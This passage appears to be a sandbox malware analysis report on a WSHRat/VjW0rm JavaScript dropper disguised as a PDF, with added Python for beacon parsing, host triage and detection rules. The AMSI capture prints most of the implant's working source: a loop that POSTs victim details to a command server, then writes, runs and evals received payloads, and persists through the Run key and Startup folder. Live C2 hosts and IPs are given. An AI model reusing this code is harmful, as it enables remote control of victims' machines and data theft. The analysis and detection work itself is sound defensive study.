Source: C:\Windows\System32\wscript.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: 34003198.pdf.js Static file information: File size 3953355 > 1048576

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: (buffer reflowed one statement per line; as captured it begins mid-array and is cut off mid-function)
    WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];
    var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];
    var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];
    var sh = Cr(0);
    var fs = Cr(1);
    var spl = "|V|";
    var Ch = "\\";
    var VN = "JUNE" + "_" + Ob(6);
    var fu = WScript.ScriptFullName;
    var wn = WScript.ScriptName;
    var U;
    try {
        U = sh.RegRead(g[2]);
    } catch(err) {
        var sv = fu.split("\\");
        if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}
    }
    Ns();
    do {
        try {
            var P = Pt('Vre','');
            P = P.split(spl);
            if (P[0] === "Cl") {WScript.Quit(1);}
            if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}
            if (P[0] === "Ex") {eval(P[1]);}
            if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}
            if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("|U|","|V|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}
            if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}
            if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}
        } catch(err) {}
        WScript.Sleep(7000);
    } while (true) ;
    function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}
    function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}
    function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}
    function Cr(N) {return new ActiveXObject(j[N]);}
    function Ob(N) {
        var s;
        if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}
        if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}
        if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();
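The AMSI buffer above documents the VjW0rm tasking protocol end to end: nf() builds a backslash-delimited victim profile (campaign tag VN, computer name, user name, OS caption, AV product, an empty field, a .NET 2.0 check, and the U flag recording whether the script was launched from a drive root) and sends it as the User-Agent of a POST to http://jemyy.theworkpc.com:5401/Vre every 7 seconds; the response is split on "|V|" into an opcode (Cl, Sc, Ex, Rn, Up, Un, RF) plus up to two arguments. The Python below is an added example and not code from the report or the sandbox vendor: it parses that beacon out of proxy log lines and decodes the tasking response the same way the script does, including the |U| to |V| swap the Up command performs. The proxy-log format and the log contents are constructed for the example, and the campaign tag "JUNE_1A2B3C4D" is made up, because the buffer is cut off before Ob(6) returns the value the real tag is built from.

```python
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional
from urllib.parse import urlparse

# Separators taken from the captured script: spl (record separator) and Ch (field separator).
TASK_SEP = "|V|"
FIELD_SEP = "\\"

# Opcodes handled by the do/while loop in the capture, mapped to what each one does.
OPCODES = {
    "Cl": "quit",
    "Sc": "write P[1] to %temp%\\P[2] and run it",
    "Ex": "eval(P[1]) inside the running script",
    "Rn": "rewrite own campaign tag to P[1] and relaunch",
    "Up": "write updated script to %temp%\\P[2], run it with wscript //B, quit",
    "Un": "eval templated uninstall script P[1], quit",
    "RF": "write P[1] to %temp%\\P[2] and run it",
}
FILE_OPCODES = {"Sc", "Up", "RF"}  # the opcodes that carry a file name in P[2]


@dataclass
class Beacon:
    campaign_tag: str   # VN = "JUNE_" + Ob(6)
    computer: str       # %COMPUTERNAME%
    user: str           # %USERNAME%
    os_caption: str     # Win32_OperatingSystem.Caption
    av_product: str     # AntiVirusProduct.DisplayName
    dotnet2: str        # "YES" if vbc.exe exists under Framework\v2.0.50727
    drive_root: str     # U: "TRUE" if the script ran from the root of a drive


def parse_beacon(user_agent: str) -> Optional[Beacon]:
    """Parse the string nf() places in the User-Agent header; None if it does not match."""
    # nf() yields VN\COMPUTER\USER\OS\AV\\NT\U\  -> nine fields, empty at index 5 and 8
    f = user_agent.split(FIELD_SEP)
    if len(f) != 9 or f[5] != "" or f[8] != "":
        return None
    if "_" not in f[0] or f[6] not in ("YES", "NO") or f[7] not in ("TRUE", "FALSE"):
        return None
    return Beacon(f[0], f[1], f[2], f[3], f[4], f[6], f[7])


@dataclass
class Task:
    opcode: str
    action: str
    payload: str
    filename: Optional[str]


def parse_task(body: str) -> Optional[Task]:
    """Split a C2 response the way the script does: opcode|V|payload|V|filename."""
    p = body.split(TASK_SEP)
    if p[0] not in OPCODES:
        return None
    payload = p[1] if len(p) > 1 else ""
    if p[0] == "Up":
        # An updated script body would itself contain the separator, so the C2 ships it
        # with |U| in place of |V| and the implant swaps it back before writing the file.
        payload = payload.replace("|U|", "|V|")
    filename = p[2] if p[0] in FILE_OPCODES and len(p) > 2 else None
    return Task(p[0], OPCODES[p[0]], payload, filename)


@dataclass
class Hit:
    ts: datetime
    src: str
    host: str
    port: int
    beacon: Beacon


# Constructed proxy-log layout (an assumption for this example): ts src METHOD url "user-agent"
LOG_RE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "(?P<ua>[^"]*)"$')


def scan_proxy_log(lines: List[str]) -> List[Hit]:
    """Flag POSTs to a /Vre path whose User-Agent parses as a VjW0rm victim profile."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        url = urlparse(m.group("url"))
        if not url.path.endswith("/Vre"):
            continue
        beacon = parse_beacon(m.group("ua"))
        if beacon is None:
            continue
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
        hits.append(Hit(ts, m.group("src"), url.hostname or "", url.port or 80, beacon))
    return hits


def beacon_intervals(hits: List[Hit]) -> List[float]:
    """Gaps between consecutive hits in seconds; the script sleeps 7000 ms per loop."""
    ts = sorted(h.ts for h in hits)
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]


# Constructed sample log lines (not from the report's capture); the tag suffix is made up.
SAMPLE_PROXY_LOG = [
    '2024-04-16T09:00:01Z 10.0.0.5 POST http://jemyy.theworkpc.com:5401/Vre '
    '"JUNE_1A2B3C4D\\DESKTOP-01\\user\\Microsoft Windows 10 Pro\\Windows Defender\\\\NO\\FALSE\\"',
    '2024-04-16T09:00:03Z 10.0.0.5 GET http://www.example.com/index.html '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '2024-04-16T09:00:08Z 10.0.0.5 POST http://jemyy.theworkpc.com:5401/Vre '
    '"JUNE_1A2B3C4D\\DESKTOP-01\\user\\Microsoft Windows 10 Pro\\Windows Defender\\\\NO\\FALSE\\"',
]

if __name__ == "__main__":
    found = scan_proxy_log(SAMPLE_PROXY_LOG)
    for h in found:
        print(h.ts.isoformat(), h.src, "->", f"{h.host}:{h.port}", h.beacon)
    print("intervals:", beacon_intervals(found))
    print(parse_task("Sc|V|WScript.Echo(1)|V|note.js"))
```

Matching on the nine-field User-Agent shape rather than on the host name keeps the rule useful after the operator moves the C2; the 7-second cadence from WScript.Sleep(7000) is a second, independent signal worth alerting on when the same source repeats POSTs to the same /Vre path.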

Boot Survival

Source: C:\Windows\System32\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 34003198 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js Jump to behavior
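The Boot Survival entries above record the sample's two persistence mechanisms: a value named 34003198 under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and copies of itself (34003198.pdf.js, plus bCdHGOcGLp.js) in the current user's Startup folder, each written together with a Zone.Identifier stream (Mark of the Web). The Python below is an added host-triage example, not part of the report: it lists WSH scripts in a Startup folder, notes double extensions and an Internet-zone MotW, and on Windows enumerates HKCU Run values that launch scripts and checks for the HKCU\vjw0rm value the captured script writes with RegWrite. The report does not show the Run value's data, so the Run-key heuristic only looks for wscript/cscript or a script extension; the lure-extension list is an assumption, and the ":Zone.Identifier" read only resolves on NTFS under Windows.

```python
import os
import re
import sys
from dataclasses import dataclass
from typing import List, Optional

# WSH script extensions; a lure extension in front of one of them (34003198.pdf.js)
# is the double-extension pattern the report flags. The lure list is an assumption.
WSH_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf"}
DOUBLE_EXT_RE = re.compile(r"\.(pdf|doc|docx|xls|xlsx|jpg|png|txt)\.(js|jse|vbs|vbe|wsf)$", re.I)

STARTUP_SUBPATH = os.path.join("Microsoft", "Windows", "Start Menu", "Programs", "Startup")
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"


@dataclass
class Finding:
    kind: str        # "startup-script" | "run-key" | "vjw0rm-marker"
    location: str
    detail: str


def current_user_startup_folder() -> str:
    """%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup, where the sample copies itself."""
    return os.path.join(os.environ.get("APPDATA", ""), STARTUP_SUBPATH)


def read_zone_identifier(path: str) -> Optional[str]:
    """Return the Zone.Identifier stream written next to a dropped file, if it can be read.
    Opening 'file:Zone.Identifier' only works on NTFS under Windows; elsewhere this is None."""
    try:
        with open(path + ":Zone.Identifier", "r", errors="replace") as f:
            return f.read()
    except OSError:
        return None


def classify_startup_entries(folder: str, names: List[str]) -> List[Finding]:
    """Flag WSH scripts among Startup folder entries; note double extensions and Internet MotW."""
    findings = []
    for name in sorted(names):
        if os.path.splitext(name)[1].lower() not in WSH_EXT:
            continue
        path = os.path.join(folder, name)
        notes = ["WSH script in Startup folder"]
        if DOUBLE_EXT_RE.search(name):
            notes.append("double extension")
        zone = read_zone_identifier(path)
        if zone and "ZoneId=3" in zone:
            notes.append("MotW ZoneId=3 (downloaded from the Internet)")
        findings.append(Finding("startup-script", path, "; ".join(notes)))
    return findings


def check_startup_folder(folder: str) -> List[Finding]:
    if not os.path.isdir(folder):
        return []
    return classify_startup_entries(folder, os.listdir(folder))


def suspicious_run_value(data: str) -> bool:
    """True if a Run value launches a WSH script directly or via wscript/cscript."""
    d = data.lower()
    return "wscript" in d or "cscript" in d or re.search(r"\.(js|jse|vbs|vbe|wsf)\b", d) is not None


def check_registry() -> List[Finding]:
    """HKCU Run values that launch scripts, plus the HKCU\\vjw0rm value the captured script writes."""
    if sys.platform != "win32":
        return []
    import winreg  # Windows-only; imported here so the file-system checks stay portable
    findings = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        i = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:
                break
            i += 1
            if suspicious_run_value(str(data)):
                findings.append(Finding("run-key", f"HKCU\\{RUN_KEY}\\{name}", str(data)))
    try:
        # RegRead("HKCU\\vjw0rm") in the capture addresses a value named vjw0rm directly under HKCU.
        data, _ = winreg.QueryValueEx(winreg.HKEY_CURRENT_USER, "vjw0rm")
        findings.append(Finding("vjw0rm-marker", "HKCU\\vjw0rm", str(data)))
    except OSError:
        pass
    return findings


def triage() -> List[Finding]:
    return check_startup_folder(current_user_startup_folder()) + check_registry()


if __name__ == "__main__":
    for f in triage():
        print(f.kind, f.location, "->", f.detail)
```

Run it as the affected user (the artifacts live under that user's HKCU hive and profile); a finding with both "double extension" and "ZoneId=3" on a Startup folder script reproduces exactly the combination the sandbox observed here.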

Hooking and other Techniques for Hiding and Protection

Source: Possible double extension: pdf.js Static PE information: 34003198.pdf.js
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 5401
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 5401
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 5401
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 5401
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 5401
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49766 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49769 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49771 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 1604
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 1604
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895272913.0000020BE1D2C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW/b
Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895073011.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895272913.0000020BE1D2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2074574369.00000221C11D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000006.00000003.2074574369.00000221C11D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWG
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.
Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RA

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe Network Connect: 94.156.71.108 1604
Source: C:\Windows\System32\wscript.exe Network Connect: 109.248.151.106 5401
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894450811.0000020BE2044000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895295189.0000020BE2044000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : select * from antivirusproduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter : AntiVirusProduct
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\securitycenter2 : AntiVirusProduct
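The process-creation and network entries in this section are the behaviours a host-based detection would key on: wscript.exe started in batch mode (//B) on a script under %AppData%\Roaming, one of them carrying a double extension (34003198.pdf.js), wscript.exe spawning wscript.exe, and the script host connecting to public addresses on ports 1604 and 5401. The following is an added example, not code from the report, from Joe Sandbox, or from the sample: a small rule set that reproduces those checks over Sysmon-style process and network events. The event dictionary layout is an assumption; the command lines and destinations are copied from the entries above, and the two benign control events are constructed.

```python
"""Added example for this report, not code from Joe Sandbox or the sample.

Host-telemetry rules that reproduce what the report's signatures flag for this
WSHRat/VjW0rm dropper: wscript.exe run in batch mode (//B) on a double-extension
script from %AppData%\\Roaming, wscript spawning wscript, and a script host
connecting to public addresses on non-standard ports (1604, 5401).
The event dict layout is an assumption modelled on Sysmon process/network
events; command lines and destinations come from the report, the two benign
control events are constructed.
"""
import re
from ipaddress import ip_address

WSCRIPT = r"C:\Windows\System32\wscript.exe"

SAMPLE_EVENTS = [
    # From the report: wscript.exe launching the dropped and the original script.
    {"type": "process", "image": WSCRIPT, "parent_image": WSCRIPT,
     "cmdline": r'"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"'},
    {"type": "process", "image": WSCRIPT, "parent_image": WSCRIPT,
     "cmdline": r'"C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"'},
    # Constructed benign control: a logon script run from a domain share.
    {"type": "process", "image": r"C:\Windows\System32\cscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"cscript.exe \\fileserver\netlogon\inventory.vbs"},
    # From the report: the two C2 connections.
    {"type": "network", "image": WSCRIPT, "dst_ip": "94.156.71.108", "dst_port": 1604},
    {"type": "network", "image": WSCRIPT, "dst_ip": "109.248.151.106", "dst_port": 5401},
    # Constructed benign control: script host talking to an internal web server.
    {"type": "network", "image": WSCRIPT, "dst_ip": "10.0.0.5", "dst_port": 443},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh")
# A "document" extension immediately followed by a script extension: 34003198.pdf.js
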